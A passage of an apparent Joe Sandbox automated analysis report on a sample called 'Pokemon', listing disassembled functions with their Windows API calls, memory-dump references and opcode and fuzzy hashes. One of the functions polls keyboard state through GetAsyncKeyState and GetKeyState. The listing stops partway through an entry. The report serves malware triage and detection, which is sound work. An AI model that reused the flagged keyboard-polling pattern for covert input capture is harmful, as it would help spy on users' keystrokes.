                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90C16871608305AFD704DF68C8849ABB7E9FF89B48F10492DF9899B251D730ED86CB52
                                                                                                                                                                                                                                                                                      Function 001084DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00108538
                                                                                                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001085D4
                                                                                                                                                                                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 001085E8
                                                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00130CD4,00000000,00000001,00157E8C,?), ref: 00108634
                                                                                                                                                                                                                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001086B9
                                                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00108711
                                                                                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0010879C
                                                                                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001087BF
                                                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 001087C6
                                                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0010881B
                                                                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00108821
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 541140bafdb215276d5b9883535dad4980ed20993e35748b01d7ec9179fd8e30
                                                                                                                                                                                                                                                                                      • Instruction ID: 35c0376dc15d55230331b961583e4717e28b2972cd12694bd7f5b6afb5cdbf2e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 541140bafdb215276d5b9883535dad4980ed20993e35748b01d7ec9179fd8e30
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9DC12975A00105AFCB14DFA4C888DAEBBF5FF48304B148099F55AAB262DB70ED46CB90
                                                                                                                                                                                                                                                                                      Function 000F0378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 000F039F
                                                                                                                                                                                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 000F03F8
                                                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 000F040A
                                                                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 000F042A
                                                                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 000F047D
                                                                                                                                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 000F0491
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 000F04A6
                                                                                                                                                                                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 000F04B3
                                                                                                                                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000F04BC
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 000F04CE
                                                                                                                                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000F04D9
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c3846bef3a63a46ae7caef3e48dd0ee21845d6e8190ab7b54d0221d5b3f87d6c
                                                                                                                                                                                                                                                                                      • Instruction ID: 22512091e14d54782bc8c91c6273dba543d80f8ee85adf3764868703189dd83f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c3846bef3a63a46ae7caef3e48dd0ee21845d6e8190ab7b54d0221d5b3f87d6c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE415175A00219EFCF10EF94D8449ED7BB9FF48344F008065EA45A7A62C730B946DB90
                                                                                                                                                                                                                                                                                      Function 000FA635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 000FA65D
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 000FA6DE
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 000FA6F9
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 000FA713
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 000FA728
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 000FA740
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 000FA752
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 000FA76A
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 000FA77C
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 000FA794
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 000FA7A6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1aee81f19e05997eb323fe788ac624780138376998b42be823502bfa196c02e5
                                                                                                                                                                                                                                                                                      • Instruction ID: d69c0ac51ca5710573cfbea7da097ec84842f647ac4edafb72750afc32ef5096
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1aee81f19e05997eb323fe788ac624780138376998b42be823502bfa196c02e5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 624197A47087CD6EFFB1666088047B5BEF06B17344F088059D7CA96EC2DB9899C4D763
                                                                                                                                                                                                                                                                                      Function 00119730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                                      • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                                      • Opcode ID: dde41bb69e6e652a4ed432471e208445e2210a190c2225f6ac534f7613eca71c
                                                                                                                                                                                                                                                                                      • Instruction ID: 37b0555ab525e1594829fc392bb2591d4f2e08cb6ce105d6634c8cb2e5739686
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dde41bb69e6e652a4ed432471e208445e2210a190c2225f6ac534f7613eca71c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4051D331A0051A9BCF18DF68C9618FEB7A5BF25364B204239E876E72C5DB31DE81C790
                                                                                                                                                                                                                                                                                      Function 00114189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CoInitialize.OLE32 ref: 001141D1
                                                                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 001141DC
                                                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00130B44,?), ref: 00114236
                                                                                                                                                                                                                                                                                      • IIDFromString.OLE32(?,?), ref: 001142A9
                                                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00114341
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00114393
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                      • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                                      • Opcode ID: 74db687d834a59615ac837293cf4e70df0a1ecccfde5a3df78d4a73f02ba23f5
                                                                                                                                                                                                                                                                                      • Instruction ID: e332b2d09758a2a28f4352236bf0f5ce6a94795f45a3175c0f993ffa999e4ec9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74db687d834a59615ac837293cf4e70df0a1ecccfde5a3df78d4a73f02ba23f5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3661A271608711EFD318DF64D848BAEB7E4AF49B14F000529F9959B291D770ED84CB92
                                                                                                                                                                                                                                                                                      Function 00108BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 00108C9C
                                                                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00108CAC
                                                                                                                                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00108CB8
                                                                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00108D55
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00108D69
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00108D9B
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00108DD1
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00108DDA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                                                                      • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                                      • Opcode ID: 846ae4167d3a01dc5c9485646b94c473e0f2acbc86e2123479a26e7b1a8b855d
                                                                                                                                                                                                                                                                                      • Instruction ID: 9f7c34a42cc02f3e48bbad2880d53bf856b0c10600f75a2a1056b5e370d23a85
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 846ae4167d3a01dc5c9485646b94c473e0f2acbc86e2123479a26e7b1a8b855d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32614872508305AFDB10EF60C8459EEB3E9FF99310F04492AF9C987292DB71E945CB92
                                                                                                                                                                                                                                                                                      Function 001246E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateMenu.USER32 ref: 00124715
                                                                                                                                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00124724
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001247AC
                                                                                                                                                                                                                                                                                      • IsMenu.USER32(?), ref: 001247C0
                                                                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 001247CA
                                                                                                                                                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001247F7
                                                                                                                                                                                                                                                                                      • DrawMenuBar.USER32 ref: 001247FF
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                      • String ID: 0$F
                                                                                                                                                                                                                                                                                      • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                                      • Opcode ID: bc2f6f95ed227a37de8464a9c9365fa90896668fe4b16090d9ef14ca3fdc8833
                                                                                                                                                                                                                                                                                      • Instruction ID: a200b96df3a92bbab14897497ea6acfa63c1aaf7c116b5ada8d8c911fe85532c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc2f6f95ed227a37de8464a9c9365fa90896668fe4b16090d9ef14ca3fdc8833
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7418975A11219EFDF24CFA4E884EAA7BB5FF49314F144028FA46A7350D7B0A921CF50
                                                                                                                                                                                                                                                                                      Function 000F282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 000F4620
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 000F28B1
                                                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 000F28BC
                                                                                                                                                                                                                                                                                      • GetParent.USER32 ref: 000F28D8
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 000F28DB
                                                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 000F28E4
                                                                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 000F28F8
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 000F28FB
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                      • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                      • Opcode ID: 5e0b9718cfd6a645266c8ac6cf08e9e15f48c618a2ddc1a00ddfe3f5c315be3e
                                                                                                                                                                                                                                                                                      • Instruction ID: a6459711ed45a639ce7d60bc407894628edcbb87d0ef7dbb8ab3dfdcd9a86d7f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e0b9718cfd6a645266c8ac6cf08e9e15f48c618a2ddc1a00ddfe3f5c315be3e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE21C274900118BBCF10EBA0DC85DFEBBB4EF05360F004116BA61A7292DB794959EB60
                                                                                                                                                                                                                                                                                      Function 000F290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 000F4620
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 000F2990
                                                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 000F299B
                                                                                                                                                                                                                                                                                      • GetParent.USER32 ref: 000F29B7
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 000F29BA
                                                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 000F29C3
                                                                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 000F29D7
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 000F29DA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                      • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                      • Opcode ID: a70d41ccaf8ffdb7e26c43f1a1b4b53e41d7401c4083153e3641385cee83b11f
                                                                                                                                                                                                                                                                                      • Instruction ID: f8f34a6b98a1ef1ae3b45499ec447a404ff16eba96c94aeca9cc2bf2ac848f67
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a70d41ccaf8ffdb7e26c43f1a1b4b53e41d7401c4083153e3641385cee83b11f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1521D5B5E01118BBCF11EFA0DC85EFEBBB8EF05310F404116BA51A7192DB794959EB60
                                                                                                                                                                                                                                                                                      Function 001244BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00124539
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0012453C
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00124563
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00124586
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001245FE
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00124648
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00124663
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 0012467E
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00124692
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 001246AF
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 977211eca57c6ab4dff64e72de6b55cb7ff544ef3eb31535dea34b7268f3ad8d
                                                                                                                                                                                                                                                                                      • Instruction ID: 6cbdab35d6415a6437ecfaf6cd43d2ca6fba7e265a6e83920d232fbc03cab7ef
